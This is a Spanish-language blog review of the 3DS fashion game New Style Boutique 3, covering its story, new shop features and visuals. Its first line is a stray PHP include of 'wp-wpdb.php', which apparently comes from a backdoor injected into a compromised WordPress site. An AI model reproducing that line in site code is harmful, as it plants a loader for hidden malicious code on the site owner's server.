if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis New Style Boutique 3 – La Fortaleza de LeChuck

Análisis New Style Boutique 3

El mundo de la moda dispone de muchos seguidores alrededor del globo pero existen muy poquitos juegos que exploten todas sus posibilidades. Por suerte, Nintendo se atreve con todo y tiene la franquicia perfecta para los seguidores del mundillo: New Style Boutique, una explosión de estilos japoneses que alcanza una nueva dimensión en New Style Boutique 3: estilismo para celebrities.

La serie New Style Boutique arrancó en 2012 en 3DS como versión mejorada de Style Boutique, título de la anterior portátil de Nintendo. La actualización para 3DS hizo muy divertida la experiencia gracias a un apartado gráfico más atractivo y multitud de opciones relacionadas con la moda y belleza, además disponía de moda masculina. La secuela añadió peluquería, salón de belleza y otros establecimientos pero eliminó la clientela masculina, algo que realmente no gustó. New Style Boutique 3: estilismo para celebrities ha unificado lo mejor de la saga para deslumbrar con nuestro arte como fashionista.

Nuestra llegada a la boutique

Lo primero que observamos al arrancar el juego es que el editor de personaje es mucho más completo y delante de nuestros ojos se despliega un enorme catálogo para crear nuestro personaje. Después de completar el riguroso proceso, da comienzo la historia de nuestra estilista con la ya habitual excusa que nos hace heredar la boutique. En este caso llegamos a la ciudad y visitamos a nuestro tío en su tienda de ropa, quien nos anuncia de sopetón que se ha cansado de su actual vida y va a tomarse una temporada sabática viajando por el mundo. De esta forma tan accidentada adquirimos la boutique y el piso de arriba como vivienda. A partir de aquí empieza nuestra carrera hacia la cima.

A diferencia de los títulos anteriores que estaban más enfocados a triunfar en la pasarela, New Style Boutique 3 nos lanza al mundo de las celebrities, aunque lo más correcto sería decir «idols«, las artistas que en Japón causan furor como cantantes, modelos y actrices, ya que ser idol en Japón es dominar estas tres disciplinas. Nuestro trabajo será ser su asesora de imagen y ayudar a estas chicas a cumplir su sueño. Una de las futuras promesas es Melisa, una chica de pueblo que sueña con convertirse en toda una celebridad. Para ello, ingresa en la nueva agencia de talentos. Y como ella llegarán otras muchachas de diversa índole.

Melisa, al igual que otras idols, acudirán a nuestra boutique en busca de conjuntos

Me resulta muy curioso comprobar como las nuevas corrientes sociales como Youtube y los «influencers» tienen cabida en el juego con referencias constantes a followers, likes y número de visitas. Además, veremos como nuestras chicas triunfan haciendo directos desde «Miautube». Con este tipo de contenido, New Style Boutique parece más cercano a la realidad que su antecesor, que incluía elementos fantásticos que chirriaban dentro de la temática del juego. New Style Boutique 3 nos acerca una historia más solida a través de los personajes que llegan a la ciudad para labrarse un futuro.

Novedades jugables

Por nuestro establecimiento pasarán clientas que necesitan un artículo concreto, o un conjunto de un estilo. También puede que sobre la marcha nos pidan más artículos. Todas ellas tienen en común sus disparatadas historias como la de la señorita que quería una falda roja para que así no se vean las manchas de salsa boloñesa. Si acertamos con sus peticiones, nos invitarán a salir por la ciudad y compartirán con nosotras fotos de momentos especiales.

Más de 20.000 artículos nos esperan. Entre ellos nuevos accesorios

Entre las novedades del juego destaca la vuelta de dos características incluidas en el primer título para 3DS que fueron retiradas en el anterior: un ayudante y la moda masculina. Nuestro ayudante es mucho más que una cara bonita a la que vestir, esta vez se implicará en la historia y nos informará de asuntos de interés de la boutique. Respecto a la moda masculina, volverá de una forma más coherente, es decir, mediante otra boutique dedicada a la ropa para hombre donde iremos a echar una mano.

No faltarán la peluquería y el salón de belleza, locales que disfrutamos en la segunda entrega y que regresan con más servicios y estilos. Y también necesitarán de nuestro talento, por supuesto, pero esta vez no veremos un duro. Y esto representa un pequeño problema, ya que al no obtener beneficio económico iremos más apretados al comienzo del juego hasta que nos fichen como estilista en la agencia de talentos.

Peluquería, maquillaje y uñas… Ponte a la última

Otra de las novedades más interesantes es la opción reponer, ideal para cuando una clienta nos pide una prenda y no tenemos stock en ese momento. Si presionamos sobre dicho botón, podremos acudir a la Central de la Moda y volver para satisfacer sus necesidades. Para facilitarnos las cosas, también se ha añadido la pestaña de artículos adquiridos anteriormente, porque no hay nada más molesto que comprar dos veces la misma prenda. Por último, me ha parecido muy acertada la decisión de ofrecer la bolsa a la clienta al salir. Recordemos que en el primer título dábamos la bolsa en la tienda y en el anterior la bolsa era invisible, además se había incorporado una secuencia extraña de despedida. Aquí han reparado el error; se la ofrecemos en la tienda y a continuación nos despedimos en la puerta. Quizá parece una tontería e incluso exagerado en nuestra visión occidental del mundo, pero esto pasa en Japón y yo lo he vivido en mis carnes.

Despedir al cliente en la puerta es muy habitual en las boutiques japonesas

Nuestro smartphone seguirá siendo nuestro mejor aliado para enterarnos de las noticias de la ciudad. Dentro de nuestro móvil dispondremos de aplicaciones como el canal diseño, un modo online que nos permitirá vender nuestros diseños y comprar los de la comunidad (se echó en falta la funcionalidad online en el 2); o el Miautube, donde se recopilarán todas las actuaciones de las artistas. También es muy útil la aplicación de mensajería para enviar mensajes predefinidos a las clientas y así invitarlas a pasarse por la tienda.

Apartado visual

New Style Boutique 3 dispone de un renovado diseño más shojo y añade nuevas animaciones y mejoras gráficas para que desprenda monería y fashionismo por los cuatro costados. Por otro lado, la personalización sigue siendo una pieza clave y en el título se amplía con el fin de crear nuestro espacio perfecto. Desgraciadamente, han eliminado de la ciudad la posibilidad de hablar con las clientas en la calle, o la decoración en eventos como el de navidad (además ninguna clienta hace referencia alguna). Otro aspecto negativo que he percibido es que el día acaba más rápido que de costumbre y por la noche no tenemos mucha gente a la que atender. A pesar de estos pequeños fallos, hay posibilidades de sobra para disfrutar a largo plazo.

A grandes rasgos, New Style Boutique 3 coge lo mejor de entregas anteriores y lo mejora creando un título más compacto donde la historia y las tendencias actuales dominan el contenido. Un juego ideal para los amantes de la moda japonesa y la creación de conjuntos.